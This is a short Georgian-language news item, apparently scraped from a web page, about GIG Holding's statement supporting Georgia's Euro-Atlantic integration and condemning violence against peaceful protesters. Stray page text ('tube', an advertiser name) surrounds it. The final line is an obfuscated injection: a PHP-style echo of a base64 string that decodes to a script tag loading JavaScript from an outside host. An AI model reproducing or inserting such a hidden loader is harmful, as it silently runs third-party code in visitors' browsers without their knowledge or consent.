tube
ავერსი jaluzi

 საქართველოს ინდუსტრიული ჯგუფი GIG ჰოლდინგი ქვეყანაში განვითარებულ მოვლენებზე განცხადებას ავრცელებს, სადაც ნათქვამია, რომ ევროატლანტიკური ინტეგრაციის გზაზე ნებისმიერი შეფერხება მიუღებელია და საფრთხეს უქმნის ქვეყნის უსაფრთხოებასა და პოტენციალს.

მულტიინდუსტრიულ ჯგუფში გმობენ ნებისმიერი ფორმის ძალადობას მოქალაქეებსა და მშვიდობიან მომიტინგეებზე.

„ჯიაიჯი ჰოლდინგი საქართველოს დამოუკიდებლობის თანატოლია. ერთად გავიარეთ ურთულესი წლები.

ჩვენ და ჩვენი გუნდი მუდამ ერთგული ვრჩებით ქვეყნის კონსტიტუციაში არსებული ჩანაწერის, რომელიც მკაფიოდ განსაზღვრავს საქართველოს განვითარების მთავარ ვექტორს, მის სწრაფვას ევროატლანტიკური სივრცისკენ.

დაუშვებლად მივიჩნევთ ნებისმიერ შეფერხებას ამ მიზნისკენ მიმავალ გზაზე, ეს საფრთხეს უქმნის ჩვენი ქვეყნის უსაფრთხოებას და პოტენციალის რეალიზებას.

ვგმობთ ნებისმიერი ფორმის ძალადობას ჩვენს თანამოქალაქეებზე, მშვიდობიან მომიტინგეებზე.

ქართული მულტიინდუსტრიული ჰოლდინგი“, - აღნიშნულია განცხადებაში.

104
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");